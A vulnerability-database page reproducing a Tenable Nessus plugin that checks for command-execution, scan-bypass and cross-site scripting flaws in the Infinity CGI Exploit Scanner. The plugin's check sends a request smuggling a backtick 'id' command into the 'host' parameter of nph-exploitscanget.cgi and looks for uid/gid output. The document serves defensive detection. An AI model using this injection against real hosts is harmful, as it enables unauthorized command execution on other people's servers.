Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2003-2021 Tenable Network Security, Inc.NPH-EXPLOITSCANGET.NASL
HistoryJun 16, 2003 - 12:00 a.m.

Infinity CGI Exploit Scanner Multiple Vulnerabilities

2003-06-1600:00:00
This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.
www.tenable.com
95
JSON

The remote is running Infinity Exploit Scanner, a web-based CGI vulnerability scanner implemented in perl and stored under the name ‘nph-exploitscanget.cgi’.

There is a flaw in this CGI that lets an attacker execute arbitrary commands on this host.

In addition to this, there is a flaw in this CGI that could allow an attacker to use this CGI to scan third-party hosts by bypassing the policy set by the administrator of this CGI. This CGI is also vulnerable to cross-site scripting issues.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

if(description)
{
  script_id(11740);
  script_version("1.23");
  script_bugtraq_id(7910, 7911, 7913);

  script_name(english:"Infinity CGI Exploit Scanner Multiple Vulnerabilities");
  script_summary(english:"Checks for the presence of nph-exploitscanget.cgi");

  script_set_attribute(
    attribute:'synopsis',
    value:'The remote service is vulnerable to multiple flaws.'
  );

  script_set_attribute(
    attribute:'description',
    value:"The remote is running Infinity Exploit Scanner, a web-based CGI vulnerability
scanner implemented in perl and stored under the name 'nph-exploitscanget.cgi'.

There is a flaw in this CGI that lets an attacker execute arbitrary
commands on this host.

In addition to this, there is a flaw in this CGI that could allow an attacker
to use this CGI to scan third-party hosts by bypassing the policy set by
the administrator of this CGI. This CGI is also vulnerable to
cross-site scripting issues."
  );

  script_set_attribute(
    attribute:'solution',
    value: "Upgrade Infinity Exploit Scanner to the latest version."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(
    attribute:'see_also',
    value:'https://seclists.org/fulldisclosure/2003/Jun/412'
  );

 script_set_attribute(attribute:"plugin_publication_date", value: "2003/06/16");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");

  script_dependencie("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

http_check_remote_code (
			check_request:string("/nph-exploitscanget.cgi?host=`id`&port=", port, "&errchk=0&idsbypass=0"),
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			command:"id",
			xss: 1
			);
JSON